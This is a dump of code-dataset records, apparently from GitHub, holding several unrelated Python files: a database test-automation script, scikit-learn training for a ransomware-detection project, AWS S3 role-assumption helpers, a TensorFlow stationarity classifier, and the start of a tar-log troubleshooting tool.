sys.exit(1)\r\n #Validate raw data files\r\n if not os.path.isdir(LOCAL_DIR):\r\n app_logger.error('Input dir {LOCAL_DIR} does not exist'\\\r\n .format(LOCAL_DIR=LOCAL_DIR))\r\n sys.exit(1)\r\n if len(glob.glob(os.path.join(LOCAL_DIR,MASK))) ==0:\r\n app_logger.error('No raw data files available in {LOCAL_DIR}'\\\r\n .format(LOCAL_DIR=LOCAL_DIR))\r\n sys.exit(1)\r\n\r\n #Create HlxTools object\r\n hlxtools=HlxTools(DB_USER,DB_PASSWORD,ORACLE_SID,DB_HOST,INSTANCE_ID,MASK,\r\n LOCAL_DIR)\r\n\r\n #Kill connect\r\n app_logger.info('Stopping connect file')\r\n os_tools.kill_process('connect','{LIBRARY_NAME}_{INSTANCE_ID}'\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME,\r\n INSTANCE_ID=INSTANCE_ID))\r\n\r\n\r\n #Parse DBL file\r\n hlxtools.parse_dbl(DVX2_IMP_DIR,connect_file)\r\n 
hlxtools.activate_dbl_oracle(DVX2_IMP_DIR)\r\n\r\n # #REMOVE\r\n # #Get the DBL errors after running the simulation\r\n # error_list=hlxtools.parse_dbl_error_files()\r\n # #Get data loaded into the tables\r\n # oracle_cfg_data=hlxtools.load_cfg_data_oracle(\r\n # partrans.configuration[\"schema\"])\r\n # oracle_data=hlxtools.load_data_oracle(partrans.transformed_data,\r\n # partrans.configuration[\"schema\"])\r\n # #Compare the data\r\n # data_report=hlxtools.compare_data(partrans,\r\n # oracle_data,\r\n # parse_hld,\r\n # oracle_cfg_data)\r\n # report={}\r\n # report['data_report']=data_report\r\n # report['error_list']=error_list\r\n # report['table_list']=list(parse_hld.metadata['Tables'].dropna(how='all')\r\n # ['Table Name'])\r\n # #Generate the report\r\n # testreportjunit=TestReportJunit(report)\r\n # testreportjunit.create_db_errors()\r\n # testreportjunit.create_data_summary()\r\n # testreportjunit.create_data_missing()\r\n # testreportjunit.create_data_diffs()\r\n # testreportjunit.create_missing_cols()\r\n # testreportjunit.save_file(TEST_REPORT_FILE_JUNIT)\r\n # sys.exit(0)\r\n # #REMOVE\r\n\r\n #Create GD Access\r\n access_id=hlxtools.create_access(LIBRARY_NAME)\r\n if not access_id:\r\n app_logger.error('Access could not be created')\r\n sys.exit(1)\r\n\r\n #Delete the data in the tables\r\n hlxtools.delete_data(partrans.transformed_data)\r\n\r\n #Remove dbl temp Files\r\n hlxtools.remove_dbl_files()\r\n\r\n #Run connect\r\n worker = Thread(target=hlxtools.run_connect, args=(access_id,\r\n LIBRARY_NAME))\r\n worker.setDaemon(True)\r\n worker.start()\r\n #Wait for connect to come up\r\n hlxtools.wait_connect()\r\n \r\n #restore Dbl ActiveStatus\r\n hlxtools.restore_dbl_oracle(DVX2_IMP_DIR)\r\n\r\n #Copy rd files to input folder\r\n hlxtools.copy_rd()\r\n\r\n #Wait for raw data to be processed\r\n hlxtools.wait_rd()\r\n app_logger.info('sleeping 180 seconds')\r\n time.sleep(180)\r\n\r\n #Wait for bcp files to be processed\r\n hlxtools.wait_bcp()\r\n\r\n #Schedule CfgTables\r\n hlxtools.schedule_cf_tables(partrans.configuration[\"schema\"])\r\n #Run CfgTables\r\n hlxtools.run_cf_tables(partrans.configuration[\"schema\"])\r\n app_logger.info('sleeping 60 seconds')\r\n time.sleep(60)\r\n #Schedule Aggregations\r\n hlxtools.schedule_aggr(partrans.configuration[\"schema\"])\r\n #Run Aggregations\r\n hlxtools.run_aggr(partrans.configuration[\"schema\"])\r\n app_logger.info('sleeping 60 seconds')\r\n time.sleep(60)\r\n #Update Thinout\r\n # hlxtools.update_thinout(partrans.configuration[\"schema\"])\r\n\r\n #Get the DBL errors after running the simulation\r\n error_list=hlxtools.parse_dbl_error_files()\r\n #Get data loaded into the tables\r\n oracle_data=hlxtools.load_data_oracle(partrans.transformed_data,\r\n partrans.configuration[\"schema\"])\r\n #Get data loaded into the cfg tables\r\n oracle_cfg_data=hlxtools.load_cfg_data_oracle(\r\n partrans.configuration[\"schema\"])\r\n #Compare the data\r\n data_report=hlxtools.compare_data(partrans,\r\n oracle_data,\r\n parse_hld,\r\n oracle_cfg_data)\r\n report={}\r\n report['data_report']=data_report\r\n report['error_list']=error_list\r\n report['table_list']=list(parse_hld.metadata['Tables'].dropna(how='all')\r\n ['Table Name'])\r\n #Generate the report\r\n testreportjunit=TestReportJunit(report)\r\n testreportjunit.create_db_errors()\r\n testreportjunit.create_data_summary()\r\n testreportjunit.create_data_missing()\r\n testreportjunit.create_data_diffs()\r\n testreportjunit.create_missing_cols()\r\n 
testreportjunit.save_file(TEST_REPORT_FILE_JUNIT)\r\n\r\n #Kill connect\r\n app_logger.info('Stopping connect file')\r\n os_tools.kill_process('connect','{LIBRARY_NAME}_{INSTANCE_ID}'\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME,\r\n INSTANCE_ID=INSTANCE_ID))\r\n\r\nif __name__ == \"__main__\":\r\n conf_file=\"\"\r\n logger=LoggerInit()\r\n main()\r\n", "repo_name": "xneyder/chill", "sub_path": "chill.py", "file_name": "chill.py", "file_ext": "py", "file_size_in_byte": 7651, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 51, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "Partrans.Partrans", "line_number": 55, "usage_type": "call"}, {"api_name": "ParseHLD.ParseHLD", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 76, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 80, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 97, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 101, "usage_type": "call"}, {"api_name": "HlxTools.HlxTools", "line_number": 104, "usage_type": "call"}, {"api_name": "os_tools.kill_process", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 151, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 160, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 176, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 186, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 192, "usage_type": "call"}, {"api_name": "TestReport.TestReportJunit", "line_number": 215, "usage_type": "call"}, {"api_name": "os_tools.kill_process", "line_number": 225, "usage_type": "call"}, {"api_name": "LoggerInit.LoggerInit", 
"line_number": 231, "usage_type": "call"}]} +{"seq_id": "27434711722", "text": "import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import MinMaxScaler\nimport pickle\n\n#%%\ndef loadData():\n \"\"\"\n This function load the dataset from csv file\n Returns two DataFrame the first is X and the second is the label Y\n -------\n df : DataFrame\n X loaded from the RecapV3.csv.\n outputDF : DataFrame\n Y the label.\n \"\"\"\n \"\"\"load data from CSV files\"\"\"\n df = pd.read_csv(\"recap.csv\", index_col=False, sep=';')\n outputDF = pd.read_csv(\"out.csv\", index_col=False, sep=';')\n ##outputDF.drop(axis=1, columns=outputDF.columns[1], inplace=True)\n print('Data loaded')\n print(df.shape)\n return df,outputDF\n#%%\ndef normalizeDataSet(df):\n \"\"\"use MinMaxScaler to normalize df.\"\"\"\n scaler = MinMaxScaler()\n scaler.fit(df)\n normaLizedX = scaler.transform(df.values)\n dff = pd.DataFrame(normaLizedX)\n dff.columns = df.columns\n df = dff\n return df\n#%%\ndef trainModels(df):\n \"\"\"train model and show their accuracy.\"\"\"\n #Train a Decision Tree\n rng = np.random.RandomState(1)\n DTC = DecisionTreeClassifier(max_depth=80)\n DTC.fit(X_train, y_train)\n \n #Train an AdaBoost with Decision Tree\n rng = np.random.RandomState(1)\n AdaBoostDT = AdaBoostClassifier(\n DecisionTreeClassifier(max_depth=24), n_estimators=100, random_state=rng)\n AdaBoostDT.fit(X_train, y_train)\n\n #Train a MLP model\n mlp = MLPClassifier(alpha=1e-5,\n hidden_layer_sizes=(200, 100),\n random_state=1,\n activation=\"tanh\",\n max_iter=200)\n mlp.fit(X_train, y_train)\n \n \n #Train an SVM model\n svmModel = svm.LinearSVC()\n svmModel.fit(X_train, y_train)\n\n #Train a Random Forest\n rndmForest = RandomForestClassifier()\n rndmForest.fit(X_train, y_train)\n \n \n #Train a LogisticRegression\n clfLR = LogisticRegression(random_state=0).fit(X_train, y_train) \n \n # saving models to disk\n pickle.dump(rndmForest, open('rf.sav', 'wb'))\n pickle.dump(clfLR, open('clfr.sav', 'wb'))\n pickle.dump(svmModel, open('svm.sav', 'wb'))\n pickle.dump(mlp, open('mlp.sav', 'wb'))\n pickle.dump(AdaBoostDT, open('AdaBoostDT.sav', 'wb'))\n pickle.dump(DTC, open('dtc.sav', 'wb'))\n\n\n \n \n print('Models Accuracy ---------------')\n print(\"DecisionTree\", \"{:.2f}\".format(DTC.score(X_test, y_test)*100))\n print(\"AdaBoost DecitionTree\", \"{:.2f}\".format(AdaBoostDT.score(X_test, y_test)*100))\n print(\"MLP\", \"{:.2f}\".format(mlp.score(X_test, y_test)*100))\n print(\"RandomForestClassifier \", \"{:.2f}\".format(rndmForest.score(X_test, y_test)*100))\n\n print(\"SVM: \", \"{:.2f}\".format(svmModel.score(X_test, y_test)*100))\n print(\"Logistic Regression model : \", \"{:.2f}\".format(clfLR.score(X_test, y_test)*100))\n print('------------------------------------')\n#%%\ndf,outDF=loadData()\n#%%\nprint(\"Normalizing dataset\")\ndf=normalizeDataSet(df)\n#split the dataset to 30% test and 70% training.\nX_train, X_test, y_train, y_test = train_test_split(\n df.values, outDF.y, test_size=0.30, random_state=42)\ntrainModels(df)", "repo_name": "ryaddaoud21/RANSOMWARES-DETECTION", "sub_path": "users/dataset/PiratDown.py", "file_name": "PiratDown.py", "file_ext": "py", "file_size_in_byte": 
3472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 65, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 74, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 77, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 78, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 80, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 81, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 82, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "916815395", "text": "import boto3\nfrom io import StringIO\nimport pandas as pd\nimport pickle\nimport logging\nimport os\n\n\ndef define_supported_pages():\n \n supported_pages = {\n 'other': ['other'], # can have multiple\n '1120s': ['1120spage1', '1120spage3', '1120spage4', '1120spage5'],\n '1040': ['1040page1', '1040page2'], \n 'schedulec': ['schedulecpage1', 'schedulecpage2'], # can have multiple\n 'schedulee': ['scheduleepage1'], # can have multiple # can be missing page 2\n '1065': ['1065page1', '1065page4', '1065page5'],\n 'k11065': ['k11065page1'], # can have multiple and be uploaded with 1065 or with a 1040\n '8825': ['8825page1', '8825page2'], # can have multiple # can be missing page 2\n '1120': ['1120page1', '1120page5', '1120page6'], # page 6 added in 2018\n 'schedule1': ['schedule1page1'],\n 'schedule2': ['schedule2page1'],\n 'schedule3': ['schedule3page1'],\n 'schedule4': ['schedule4page1'],\n }\n\n return supported_pages\n\n\ndef define_multiple_pages_ok():\n \n # forms/pages that may have multiple uploaded\n multiple_pages_ok = ['schedulecpage1', 'schedulecpage2', 'scheduleepage1', 'k11065page1', '8825page1', '8825page2', 'other']\n \n return multiple_pages_ok\n \n\ndef define_k1_forms():\n \n # documents a k-1 can be affiliated with\n k1_forms = ['schedulecpage1', '1040page1']\n \n return k1_forms\n \n \ndef store_pickle(file, path, file_name):\n \n # write-binary (wb) mode\n with open(path + file_name + '.pickle', 'wb') as handle:\n pickle.dump(file, handle)\n \n \ndef load_pickle(path, 
file_name): \n \n # read-binary (rb) mode\n with open(path + file_name + '.pickle', 'rb') as handle:\n file = pickle.load(handle)\n \n return file\n \n\ndef save_csv_to_s3(s3_client, bucket, df, path, file_name):\n \n csv_buffer = StringIO()\n df.to_csv(csv_buffer)\n s3_client.Object(bucket, path + file_name).put(Body=csv_buffer.getvalue())\n logging.info(\"{0} saved to {1} bucket\".format(file_name, path))\n\n\ndef load_csv_from_s3(s3_client, bucket, path, file_name):\n \n obj = s3_client.get_object(Bucket=bucket, Key=path + file_name)\n df = pd.read_csv(obj['Body'])\n logging.info(\"{0} loaded from {1} bucket\".format(file_name, path))\n \n return df\n \n \ndef assume_data_role():\n os.getenv('AWS_SESSION_TOKEN')\n \n sts_client = boto3.session.Session().client(\"sts\")\n assumed_role_response = sts_client.assume_role(\n RoleArn=\"arn:aws:iam::785302336464:role/ocr-client-gulfcoast-test-data\", RoleSessionName=\"AssumeRoleSession1\"\n )\n \n credentials = assumed_role_response[\"Credentials\"]\n ds_session = boto3.session.Session(\n aws_access_key_id=credentials[\"AccessKeyId\"],\n aws_secret_access_key=credentials[\"SecretAccessKey\"],\n aws_session_token=credentials[\"SessionToken\"],\n region_name=\"us-east-1\",\n )\n \n sts_client_ds = ds_session.client(\"sts\")\n assumed_role_response_data = sts_client_ds.assume_role(\n RoleArn=\"arn:aws:iam::279307629071:role/ndr-client-gulfcoast-test-data\", RoleSessionName=\"AssumeRoleSession1\"\n )\n \n credentials_data = assumed_role_response_data[\"Credentials\"]\n data_session = boto3.session.Session(\n aws_access_key_id=credentials_data[\"AccessKeyId\"],\n aws_secret_access_key=credentials_data[\"SecretAccessKey\"],\n aws_session_token=credentials_data[\"SessionToken\"],\n region_name=\"us-east-1\",\n )\n \n print(data_session.client(\"sts\").get_caller_identity())\n s3_resource = data_session.resource('s3')\n s3_client = data_session.client('s3')\n \n return s3_resource, s3_client", "repo_name": "ncino-billstuart/nDR-page-prediction", "sub_path": "app/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 3701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pickle.dump", "line_number": 50, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 57, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 80, "usage_type": "call"}, {"api_name": "boto3.session.Session", "line_number": 82, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 82, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 88, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 88, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 101, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 101, "usage_type": "attribute"}]} +{"seq_id": "31411287550", "text": "import os\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom time_series_plot_auto_analysis.categories.stationarity import Stationarity\n\n\nclass StationarityDetection:\n\n def train_model_and_save(self, plots_directory_path=None, models_path=None, validation_split=0.2, 
batch_size=32,\n epochs=3):\n\n plot_image_height, plot_image_width, plot_image_color = self._get_plot_image_height_width_and_color(\n plots_directory_path=plots_directory_path)\n\n train_dataset, validation_dataset = self._get_datasets(batch_size, plot_image_height, plot_image_width,\n plots_directory_path, validation_split)\n\n model = self._train_model(plot_image_height, plot_image_width, plot_image_color,\n train_dataset, validation_dataset, epochs=epochs)\n\n model.save(models_path)\n\n return model\n\n def detect(self, models_path=None, prediction_plot_file_path=None):\n\n plot_image = cv2.imread(prediction_plot_file_path)\n plot_image_height = plot_image.shape[0]\n plot_image_width = plot_image.shape[1]\n prediction_plot = keras.utils.load_img(\n prediction_plot_file_path, target_size=(plot_image_height, plot_image_width)\n )\n prediction_plot_array = tf.keras.utils.img_to_array(prediction_plot)\n prediction_plot_array = tf.expand_dims(prediction_plot_array, 0)\n\n model = self._load_model(models_path=models_path)\n prediction_plot_predictions = model.predict(prediction_plot_array)\n prediction_plot_prediction_score = tf.nn.softmax(prediction_plot_predictions[0])\n\n stationarity_enum_list = [stationarity for stationarity in Stationarity]\n return stationarity_enum_list[np.argmax(prediction_plot_prediction_score)]\n\n def _load_model(self, models_path=None):\n return keras.models.load_model(models_path)\n\n def _get_plot_image_height_width_and_color(self, plots_directory_path=None):\n sample_plot_file_name = os.listdir(os.path.join(plots_directory_path, Stationarity.stationary.value))[0]\n sample_plot_file_path = os.path.join(plots_directory_path, Stationarity.stationary.value, sample_plot_file_name)\n plot_image = cv2.imread(sample_plot_file_path)\n return plot_image.shape\n\n def _get_datasets(self, batch_size, plot_image_height, plot_image_width, plots_directory_path, validation_split):\n train_dataset = keras.utils.image_dataset_from_directory(\n plots_directory_path,\n validation_split=validation_split,\n subset=\"training\",\n seed=123,\n image_size=(plot_image_height, plot_image_width),\n batch_size=batch_size)\n validation_dataset = keras.utils.image_dataset_from_directory(\n plots_directory_path,\n validation_split=validation_split,\n subset=\"validation\",\n seed=123,\n image_size=(plot_image_height, plot_image_width),\n batch_size=batch_size)\n # Configure the dataset for performance\n train_dataset = train_dataset.cache().prefetch(buffer_size=tf.data.AUTOTUNE)\n validation_dataset = validation_dataset.cache().prefetch(buffer_size=tf.data.AUTOTUNE)\n\n return train_dataset, validation_dataset\n\n def _train_model(self, plot_image_height, plot_image_width, plot_image_color,\n train_dataset, validation_dataset, epochs=3):\n \"\"\"\n This method is unique to each kind of plot, which is implemented\n in subclass.\n The implementation here is the default implementation.\n \"\"\"\n\n num_classes = 2\n model = keras.Sequential([\n keras.layers.Rescaling(1. 
/ 255, input_shape=(plot_image_height, plot_image_width, plot_image_color)),\n keras.layers.Conv2D(16, 3, activation='relu'),\n keras.layers.MaxPooling2D(),\n keras.layers.Conv2D(32, 3, activation='relu'),\n keras.layers.MaxPooling2D(),\n keras.layers.Conv2D(64, 3, activation='relu'),\n keras.layers.MaxPooling2D(),\n keras.layers.Flatten(),\n keras.layers.Dense(128, activation='relu'),\n keras.layers.Dense(num_classes)\n ])\n\n model.compile(\n optimizer='adam',\n loss=tf.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n model.fit(\n train_dataset,\n validation_data=validation_dataset,\n epochs=epochs\n )\n\n return model\n", "repo_name": "tadatoshi/time_series_plot_auto_analysis", "sub_path": "time_series_plot_auto_analysis/analysis.py", "file_name": "analysis.py", "file_ext": "py", "file_size_in_byte": 4714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.load_img", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "name"}, {"api_name": "tensorflow.keras.utils.img_to_array", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 46, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity.stationary", "line_number": 49, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity.stationary", "line_number": 50, "usage_type": "attribute"}, {"api_name": "time_series_plot_auto_analysis.categories.stationarity.Stationarity", "line_number": 50, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.image_dataset_from_directory", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "name"}, {"api_name": "tensorflow.keras.utils.image_dataset_from_directory", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils", "line_number": 62, 
"usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 62, "usage_type": "name"}, {"api_name": "tensorflow.data", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 84, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Rescaling", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 85, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 86, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 87, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 90, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 91, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 92, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 93, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 94, "usage_type": "name"}, {"api_name": "tensorflow.losses.SparseCategoricalCrossentropy", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "27984493856", "text": "import tarfile\r\nimport os\r\nimport sys\r\nimport re\r\nimport sys\r\nimport cchardet as chardet\r\nfrom pathlib import Path\r\n\r\n# Script details - feel free to contact!\r\nauthor_name = \"Renan Hingel\"\r\nauthor_contact = \"renanhingel@gmail.com\"\r\ngit_url = \"https://github.com/RenanHingel/tarshooter\"\r\nscript_version = \"1.0.5\"\r\n\r\n# ANSI color codes\r\nBLUE 
= \"\\033[0;34m\"\r\nCYAN = \"\\033[0;36m\"\r\nLIGHT_BLUE = \"\\033[1;34m\"\r\nLIGHT_CYAN = \"\\033[1;36m\"\r\nLIGHT_RED = \"\\033[1;31m\"\r\nCEND = \"\\033[0m\"\r\n\r\n\r\ndef makedir(directory):\r\n # Check if the informed directory exists\r\n is_exist = os.path.exists(directory)\r\n\r\n # If it does not exist, create it and print to console terminal\r\n if not is_exist:\r\n os.makedirs(directory)\r\n print(\"Created directory: \" + LIGHT_CYAN + directory + CEND + \".\")\r\n\r\n\r\ndef untar(file, directory):\r\n # Open the compressed file\r\n file = tarfile.open(file)\r\n\r\n # Print the compressed file contents\r\n print(\"Files found: \" + LIGHT_CYAN + str(file.getnames()) + \".\" + CEND)\r\n print(\"------------------------------------------------------------------------\")\r\n # Extract and close\r\n file.extractall(directory)\r\n file.close()\r\n\r\n\r\ndef tshoot(workdir):\r\n # We will create a command dictionary so we can store the commands found later\r\n commands_dict = {}\r\n\r\n # The delimiter variable will help us find the useful lines\r\n delimiter = \"******** show \"\r\n last_line = 0\r\n # What we want to clean from the file\r\n clean = \"******** \"\r\n clean2 = \" *******\"\r\n\r\n # Open the file supplied by the user and detect it's encoding type\r\n filepath = Path(workdir)\r\n undetected_file = filepath.read_bytes()\r\n detect_file = chardet.detect(undetected_file)\r\n\r\n with open(workdir, \"r\", encoding=detect_file[\"encoding\"]) as raw_text:\r\n read_text = raw_text.readlines()\r\n\r\n # Now, enumerate all lines inside the file and remove the \\n characters with strip\r\n for index, line in enumerate(read_text):\r\n line_count = index + 1\r\n last_line = index + 1\r\n strip_line = line.strip()\r\n if delimiter in strip_line:\r\n strip_line = strip_line.replace(clean, \"\")\r\n strip_line = strip_line.replace(clean2, \"\")\r\n # After cleaning the lines, append them to our dictionary\r\n commands_dict[strip_line] = line_count\r\n\r\n while True:\r\n # Troubleshoot mode menu\r\n command = input(\"Enter a \" + LIGHT_CYAN + \"[specific command]\" + CEND + \", \" + LIGHT_CYAN + \"[all]\"\r\n + CEND + \" to see all available commands or \" + LIGHT_CYAN + \"[1]\"\r\n + CEND + \" to quit to main menu: \")\r\n # Option 1 - exit\r\n if command == \"1\":\r\n break\r\n # Option all - will list all commands found inside the provided file\r\n if command == \"all\":\r\n print('Available commands: ' + LIGHT_CYAN + ', 